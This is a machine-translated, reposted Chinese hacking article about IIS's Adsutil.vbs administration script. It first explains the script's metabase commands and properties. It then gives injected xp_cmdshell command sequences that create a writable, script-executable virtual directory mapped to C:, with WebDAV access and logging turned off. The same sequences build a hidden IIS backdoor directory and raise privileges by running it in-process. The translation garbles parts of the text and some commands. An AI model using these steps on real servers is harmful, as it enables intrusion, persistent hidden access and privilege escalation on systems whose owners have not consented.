2. Tech
  3. Adsutil.vbs is useful in script attacks [I am not original]

Adsutil.vbs is useful in script attacks [I am not original]

xiaoxiao2021-03-06  43

This article is published in the 2005.2. Please indicate when it is reproduced, and what is Adsutil.vbs? I believe that the network administrator who used IIS will not know. This is an IIS comes with a script that manages IIS in the command line. Located in the% systemDrive% / inetpub / adminsscript directory. There is 95,426 bytes of size. Such a big script will know the powerful function. The fact is true. Basically, I feel it is the "Internet Information Service Manager" in the command line. (In fact, the 2000 server has more than 20 VBS files under the% systemDrive% / inetpub / adminsscripts for management. The 2003 only has only Adsutil.vbs. It is enough to explain how complicated its function) Adsutil.vbs have to mention Metabase.bin. This file is the most important profile of IIS. All settings for IIS will eventually be stored in this file. IIS Manager and Adsutil.vbs are displayed to the user by reading configuration information on this file. Metabase.bin's storage structure is very similar to the registry, which is a tree storage structure. IIS Manager and AdsUtil.vbs Access Metabase.bin via an ADSPATH path. The path is made by IIS: /, where localhost represents a local server, while W3SVC represents IIS services. As IIS: / LocalHost / W3SVC / 1 represents the first Web site on the local server. IIS: / localHost / W3SVC / 1 / root / vdir represents the VDIR virtual directory under the first Web site root directory. With these front knowledge, go back to Adsutil.vbs to see its usage: c: / inetpub / adminscripts> cscript adsutil.vbs // Don't forget to type CScript.exe This script host file name, Microsoft R) Windows Script Host Version 5.6 Copyright (C) Microsoft Corporation 1996-2001. all rights reserved. USAGE: Adsutil.vbs [ []] Description: IIS Administration Off Utility That Enables The Configuration of Metabase Properties. Supported commands: // supported commands. The most important GET, SET, ENUM, DELETE, CREATE, COPY, APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP PGETSTATUS Samples: // few simple examples adsutil.vbs GET W3SVC / 1 / ServerBindings // Check first A virtual Web site's bonding port. The W3SVC / 1 here is an ion: / localhostw3svc / 1, and ServerBindings is his attribute. Same. Adsutil.vbs Set W3SVC / 1 / ServerBindings ": 81:" // Set the first virtual Web site of the bonded port as 81. Adsutil.vbs Create W3SVC / 1 / Root / Myvdir "IisWebVirtualDir" // creates a MyvDir virtual directory in the first virtual Web site root directory. The following "IisWebVirtualDir" refers to the type of directory. Adsutil.vbs Start_server W3SVC / 1 // Start the first virtual Web site. Adsutil.vbs Enum / P W3SVC // View all sites of IIS.

For Extended Help Type: AdsuTil.vbs Help // If you want further viewing help, type this command. I will not turn here. Prevent someone from saying that I earn a draft fee. Everyone can look at yourself. The words after "//" are all comments I added (below). I believe it should be understood. The ordsutil.vbs we often have such a few: get, set, enum, delete, create. Now I will explain that the get command is usually used to view the value values ​​of the directory. SET is used to set the directory properties. ENUM is also used to view properties. The difference is that he directly displayed all set attributes directly. Usually a few pages of things can be seen ... he has an optional "/ P" switch. Plus this switch. He will only list all virtual directories in this directory. The delete command is used to delete the virtual directory. CREATE is a virtual directory. There are also a few commands: start_server, stop_server, pause_server, continue_server. It is started, stopped, suspended, and continues the operation of the virtual site. The approximate attribute value of a virtual directory is as follows (I only list the possibility we are using, otherwise it will be too long): keytype: (String) "IisWebVirtualDir" // directory type, (String) means it is a string type Property approot: (String) "/ LM / W3SVC / 1 / ROOT" // directory IIS path AppFriendlyName: (String) "Default App" // Application Name Appisolated: (Integer) 2 // Specify running outside the process or Digital Type Properties in the process. HTTPCUSTOMHEADERS: (1 items) // Custom IIS Data "Powered By: www.wofeiwo.info" httperrors: (42 items) // The page returned by the various IIS code. It can be set yourself. I will be omitted here. DefaultDoc: (String) The default home page name of "default.htm, index.htm, default.asp, in dex.asp, default.PHP, index.php, default.aspx, index.aspx" // directory. PATH: (STRING) "D: / ftp" // Directory The physical path of the real map AccessFlags: (Integer) 513 / / I don't know if this is. Anyway did not set it.

It seems that the AccessExecute: (Boolean) false // directory will be set automatically, which is the Boolean AccessSource: (Boolean) False // Directory WebDAV Access to Allow AccessRead: (Boolean) True // Directory Read-only Permissions AccessWrite: write permissions AccessScript (BOOLEAN) False // directory: (BOOLEAN) True // directory is allowed to execute scripts AccessNoRemoteExecute: (BOOLEAN) False AccessNoRemoteRead: (BOOLEAN) False AccessNoRemoteWrite: (BOOLEAN) False AccessNoRemoteScript: (BOOLEAN) False AccessNoPhysicalDir: ( Boolean) False Scriptmaps: (27 items) // Application Extension map ".asa, c: /windows/system32/inetsrv/asp.dll, 5, get, thehead ,post ,trace" .asp, C: /Windows/system32/inetsrv/asp.dll, 5, fulam ,post ,trace "" .aspx, c: /windows/microsoft.net/framework/v1.1.4322/ASPNET_ISAPI.DLL, 1, Get, HEA D, POST, Debug "................ / / This omitted N multi-data AspeNableParentPaths: (Boolean) True AppPoolid: (String)" Default AppPool "// application pool name DontLog: (BOOLEAN) True // ban IISLog record DirBrowseFlags: (INTEGER) -1073741762 EnableDirBrowsing: (BOOLEAN) True // whether to allow directory listing directories DirBrowseShowDate: (BOOLEAN) True // Here and Both display parameter settings during the directory. English is very simple. I don't have much to say. DirBrowseShowTime: (BOOLEAN) True DirBrowseShowSize: (BOOLEAN) True DirBrowseShowExtension: (BOOLEAN) True DirBrowseShowLongDate: (BOOLEAN) True EnableDefaultDoc: (BOOLEAN) True // whether to open the default home page document is more than I used cscript adsutil.vbs ENUM w3svc / 1 / The root command is seen in the machine. Everyone can also enter the above command research. We can all set up through the set command.

As follows: CScript Adsutil.vbs SET W3SVC / 1 / Root / Directory Name / Property Name Settings Value such as: CScript Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / AccessRead 1 // Set WOFEIWO under the first virtual Web site The virtual directory readable permission is TURE or: CScript adsutil.vbs set w3svc / 1 / root / wofeiwo / path "c: /" setting directory mapping path is "c: /" to see our simple use Example III, Adsutil.vbs Utilization (1) Uploading new ideas of MSSQL INJECTION may encounter this situation in the MSSQL injection: SA authority. You can execute the CMD command (XP_cmdshell, sp_oacreate, job, etc.). However, the server is in the inside. Outside is a fortress host. Just do an 80-port mapping. 3389 did not use (the internal network can't be connected), all reverse Trojans can't pass (TFTP, FTP, WGET, EXE2BAT, etc.) What should you do this? Amanl Big Brother classic "squeezing MSSQL last drop" gives us a good idea: using the VBS under the% SystemDrive% / INETPUB / Adminscripts to create a new virtual directory. Customize the absolute path of its mapping. This will bypass a guess for the absolute path of the web. Then you can get a shell by Backup or MaskWebtask backup database or temporary table to virtual directory (or directly echo). The above ideas are really good. However, how low the success rate of GetWebshell or Little bamboo with smelly, know how low the success rate of Backup or Maskwebtask ... and echo ... I don't want to say it. I'm writing, I'm looking for a crime. (Also do not stop the special character ...) In fact, we can improve the idea of ​​the Amanl big brother. When we build a new virtual directory. Can add a write directory permission. Plus WebDAV ... So we can directly upload any files directly through IIS? It is not only limited to text files. If we upload a reverse back door, it is performed through SA ... Oh, everything is getting it! To immediately implement: Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs CREATE w3svc / 1 / Root / wofeiwo "IIsWebVirtualDir"'; - Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Cscript Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / PATH "C: /" '; - Note that the special characters above must be transformed. Or you can perform the above commands with NBSI2 or small SQLCOMM. This way we have established a WOFEIWO virtual directory in the first Web site, mapping to the C: root directory.

I will give him read and write permissions. In order to have a WebShell, I will add the permission to execute the script: exec master..xe% systemDrive% / inetpub / adminScripts / adsutil.vbs set W3SVC / 1 / Root / wofeiwo / accessread 1 '; - Exec master..xp_cmdshell' cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / accesswrite 1 '; - Exec Master .. Xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / accessscript 1'; - Write this SurperHei "Utilization of IIS Write permissions" may want to think To construct an HTTP bag to upload files. In fact, a more simple approach: Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / EnableDirBrowsing 1'; - Exec Master..Xp_CmdShell 'Cscript. Exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / AccessSource 1 '; - Set to allow column directory and WebDAV access, then open your IE, Ctrl O open "Open" conversation Box, type the virtual directory you just set up. Select "Open in Web Folder" to determine. As shown in the figure: Figure one, ha! Will you see all the folders? As shown in the figure: Figure 2 Now you can operate the files like a normal folder. Also ctrl c, Ctrl V copy file. Easy to upload, modify files. (2) Further, in fact, we can use the idea that the idea mentioned above can be used to create an IIS back door. Come, see my realization! (Here, the method introduced in the "almost perfect IIS back door". But I have completed the settings with the tools that comes with Adsutil.vbs this MS. I can find themselves. Look.) Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Create W3SVC / 1 / Root / WOFEIWO "IisWebVirtualDir"; - // Build a WOFEIWO directory. Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Create W3SVC / 1 / Root / WOFEIWO / DOR "IISWebVirtualDir"'; - // The DOOR directory has been established in the WOFEIWO directory. Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs cscript adsutil.vbs set w3svc / 1 / root / wofeiwo / door / path "c: /"; - // Setup Directory Map to the C: root directory.

Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / DOOR / AccessRead 1'; - // Here, you will set a certain permission to the directory. . You can refer to the above command notes. Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / door / AccessWrite 1'; - Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / door / AccessScript 1 '; - Exec master..Xp_CmdShell' Cscript.exe% SystemDrive% / inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / door / DontLog 1 '; - Exec master..Xp_CmdShell' Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / door / EnableDirBrowsing 1 '; - Exec Master ..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / door / AccessSource 1'; - Exec master..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / Adminscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / door / accessexecute 1 '; - some people may say, what A. Isn't it the same as the above? Ha ha. In fact, you look carefully. Will find that our new first directory "WOFEIWO" is not set up "path" properties. That is to say, he is not mapped to any actual directory. A vulnerability of IIS (involved in IIS5.0.1.0) here is applied. That is, the virtual directory without "path" attribute is not appeared in the IIS Manager. It is equivalent to a hidden directory. The virtual directory "door" under this is also due to the unachable superior directory, so it is also invisible! But the "door" directory is set up "path" properties. So if we submit http: // ip / wofeiwo / door / path. The result is that the file directory under the C: below. Now this directory is already we can write file read files. And can also be transferred to the SYSTEM32 directory. Our back door is built. (Note I am here to add AccessExecute execution permission) but what we currently execute is still a Guest permission for IIS default IUSR users. Without big permissions, we are always unhappy. Below to enhance our permissions, add IUSR users to not say it for administrators. Let's talk about two methods: 1. Set appisolated so that the program in this directory is in the process of IIS. This inherits IIS's System authority. Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / DOOR / AppiSolated 0'; - 2, add ASP.DLL of the ASP file to IIS Privilege DLL. This makes it run in the process.

转载请注明原文地址:https://www.9cbs.com/read-58696.html

9cbs

New Post(0)